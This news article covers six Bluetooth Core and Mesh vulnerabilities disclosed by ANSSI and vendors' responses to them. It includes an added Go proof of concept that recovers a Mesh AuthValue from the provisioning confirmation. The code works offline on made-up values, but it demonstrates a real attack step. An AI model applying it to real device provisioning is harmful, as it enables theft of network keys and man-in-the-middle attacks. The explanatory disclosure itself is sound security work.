Attackers could exploit vulnerabilities in the Bluetooth Core and Mesh specifications to impersonate devices during pairing or provisioning, paving the way for man-in-the-middle (MITM) attacks.
The vulnerabilities, disclosed by researchers from the French National Cybersecurity Agency (ANSSI), allow “impersonation attacks and AuthValue disclosure”, according to an advisory from the CERT Coordination Center (CERT/CC) at Carnegie Mellon University.
Bluetooth Core and Bluetooth Mesh are separate specifications: the Core specification covers, among other things, low-power and Internet of Things (IoT) devices, while the Mesh specification covers many-to-many (m:m) communication across large-scale device networks.
6 flaws identified
The vulnerabilities are as follows:
- CVE-2020-26558 : a vulnerability in the Passkey Entry protocol, used during Secure Simple Pairing (SSP), Secure Connections (SC) and LE Secure Connections (LESC) in Bluetooth Core (v2.1 to 5.2). An attacker could send modified responses during pairing in order to determine, one bit at a time, the passkey randomly generated for that pairing, which leads to impersonation.
- CVE-2020-26555 : another vulnerability in Bluetooth Core (v1.0B to 5.2), this time in the BR/EDR PIN pairing procedure, which can also be used for impersonation. An attacker can spoof the Bluetooth device address of a target device and complete BR/EDR PIN pairing without knowing the PIN code. This attack requires a malicious device to be within wireless range.
- CVE-2020-26560 : impacting Bluetooth Mesh (v1.0, 1.0.1), this vulnerability could allow an attacker to spoof a device being provisioned by crafting responses that appear to possess the AuthValue, which could give the attacker a valid NetKey and AppKey. The attacker’s device must be within wireless range of a mesh provisioner.
- CVE-2020-26557 : affecting Bluetooth Mesh (v1.0, 1.0.1), the Mesh Provisioning protocol could allow an attacker to brute-force a fixed AuthValue, or one that is “selected predictably or with low entropy”, leading to MITM attacks on future provisioning attempts.
- CVE-2020-26556 : if the AuthValue can be identified during provisioning, the Bluetooth Mesh authentication protocol (v1.0, 1.0.1) can be abused to obtain the network key (NetKey). However, the researchers note that the attacker must identify the AuthValue before the session times out.
- CVE-2020-26559 : the Mesh Provisioning procedure used by Bluetooth Mesh (v1.0, 1.0.1) allows an attacker without access to the AuthValue to identify it without a brute-force attack.
“Even when a randomly generated AuthValue with 128-bit entropy is used, an attacker who acquires the public key of the provisioner, the provisioning confirmation value and the provisioning random value, and who provides his public key for use in the provisioning procedure, will be able to directly calculate the AuthValue,” says the notice.
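The direct calculation the advisory describes follows from how the Mesh 1.0 provisioning confirmation is built: Confirmation = AES-CMAC(ConfirmationKey, ProvisioningRandom || AuthValue), where ConfirmationKey is derived from the ECDH shared secret. An attacker who contributed its own key pair to the exchange knows that secret, and therefore the key. For a message of exactly two full blocks, CMAC is one AES encryption of a value in which AuthValue appears only by XOR, so the key holder can invert the last step and read AuthValue off the confirmation and random. The Go program below is an added illustration, not code from the researchers, CERT/CC or the Bluetooth SIG: it implements RFC 4493 AES-CMAC on the standard library, computes a confirmation from constructed values, and recovers the AuthValue from the confirmation and random alone. The ECDH exchange and the k1 derivation of ConfirmationKey are omitted; the key is simply assumed known, and every byte value is made up.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
)

const blockSize = 16

// xorBlock returns a XOR b for two 16-byte blocks.
func xorBlock(a, b []byte) []byte {
	out := make([]byte, blockSize)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// dbl doubles a 128-bit value in GF(2^128), the subkey step of RFC 4493.
func dbl(in []byte) []byte {
	out := make([]byte, blockSize)
	var carry byte
	for i := blockSize - 1; i >= 0; i-- {
		out[i] = in[i]<<1 | carry
		carry = in[i] >> 7
	}
	if carry != 0 {
		out[blockSize-1] ^= 0x87
	}
	return out
}

// subkeyK1 returns the CMAC subkey K1 = dbl(AES_K(0^128)).
func subkeyK1(block cipher.Block) []byte {
	l := make([]byte, blockSize)
	block.Encrypt(l, make([]byte, blockSize))
	return dbl(l)
}

// aesCMAC computes AES-CMAC (RFC 4493) over a message that is a non-empty
// multiple of 16 bytes, which is all the provisioning confirmation needs.
func aesCMAC(key, msg []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	if len(msg) == 0 || len(msg)%blockSize != 0 {
		panic("aesCMAC: full blocks only")
	}
	n := len(msg) / blockSize
	x := make([]byte, blockSize) // CBC chaining value, starts at zero
	for i := 0; i < n-1; i++ {
		block.Encrypt(x, xorBlock(x, msg[i*blockSize:(i+1)*blockSize]))
	}
	// The final complete block is XORed with K1 before the last encryption.
	last := xorBlock(xorBlock(x, msg[(n-1)*blockSize:]), subkeyK1(block))
	tag := make([]byte, blockSize)
	block.Encrypt(tag, last)
	return tag
}

// provisioningConfirmation models the Mesh 1.0 confirmation:
// Confirmation = AES-CMAC(ConfirmationKey, ProvisioningRandom || AuthValue).
func provisioningConfirmation(confirmationKey, random, authValue []byte) []byte {
	msg := append(append([]byte{}, random...), authValue...)
	return aesCMAC(confirmationKey, msg)
}

// recoverAuthValue undoes the last CMAC step. With a two-block message,
// Confirmation = AES_K(AES_K(Random) XOR AuthValue XOR K1), so whoever
// holds K computes AuthValue = AES_K^-1(Confirmation) XOR AES_K(Random) XOR K1.
func recoverAuthValue(confirmationKey, random, confirmation []byte) []byte {
	block, err := aes.NewCipher(confirmationKey)
	if err != nil {
		panic(err)
	}
	inner := make([]byte, blockSize)
	block.Decrypt(inner, confirmation) // AES_K(Random) XOR AuthValue XOR K1
	encRandom := make([]byte, blockSize)
	block.Encrypt(encRandom, random)
	return xorBlock(xorBlock(inner, encRandom), subkeyK1(block))
}

func main() {
	// Constructed values, not captured traffic. ConfirmationKey is assumed
	// known to the attacker, who derived it from its own ECDH key pair.
	confirmationKey, _ := hex.DecodeString("000102030405060708090a0b0c0d0e0f")
	provisionerRandom, _ := hex.DecodeString("8b19ac31d58b124c946209b5db1021b9")
	authValue, _ := hex.DecodeString("deadbeefdeadbeefdeadbeefdeadbeef") // a full 128-bit AuthValue

	confirmation := provisioningConfirmation(confirmationKey, provisionerRandom, authValue)
	recovered := recoverAuthValue(confirmationKey, provisionerRandom, confirmation)
	fmt.Printf("confirmation: %x\nrecovered AuthValue: %x\nmatch: %v\n",
		confirmation, recovered, bytes.Equal(recovered, authValue))
}
```

The point of the inversion is that the entropy of AuthValue never mattered: the confirmation is a MAC, not a commitment, and a MAC only hides its input from parties who lack the key. In the provisioning exchange the counterparty always has the key, which is why the advisory says a 128-bit random AuthValue does not help.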
The researchers also identified a potential vulnerability in Bluetooth Core LE Legacy Pairing, in versions 4.0 through 5.2, which could allow an attacker-controlled device to complete pairing without knowing the temporary key (TK).
The reactions of Android, Cisco, Cradlepoint, Microchip Technology and Red Hat
The Android Open Source Project, Cisco, Cradlepoint, Intel, Microchip Technology and Red Hat are listed as vendors whose software is affected by the disclosed vulnerabilities in one form or another.
“Android has rated this issue as high severity for Android OS and will post a fix for this vulnerability in an upcoming Android security bulletin,” says the Android Open Source Project.
“Cisco has studied the impact of the aforementioned Bluetooth specification vulnerabilities and is currently waiting for all individual product development teams to provide software patches to address them,” Cisco said.
Microchip Technology is also working on fixes.
“Cradlepoint was made aware of the BLE vulnerabilities prior to their public disclosure,” the company said. “We have a production version of our NetCloud OS code (NCOS version 7.21.40) which corrects the cited issues. Therefore, we consider this security vulnerability to be addressed.”
Red Hat has provided links to advisories for CVE-2020-26555 and CVE-2020-26558. The organization’s products are not currently believed to be vulnerable to CVE-2020-26556, CVE-2020-26557, CVE-2020-26559, or CVE-2020-26560, but Red Hat is performing assessments to investigate any potential problem.
Update when available
The Bluetooth Special Interest Group (SIG), which develops the Bluetooth standards, has also issued separate security advisories. To reduce operational risk, updates from operating system and device vendors should be applied as soon as they become available.
This research follows another Bluetooth-related security issue disclosed in September 2020 by researchers at Purdue University. Dubbed the Bluetooth Low Energy Spoofing Attack (BLESA), that vulnerability affects devices that use the Bluetooth Low Energy (BLE) protocol, the variant of Bluetooth designed for battery-constrained devices.
Source : ZDNet.com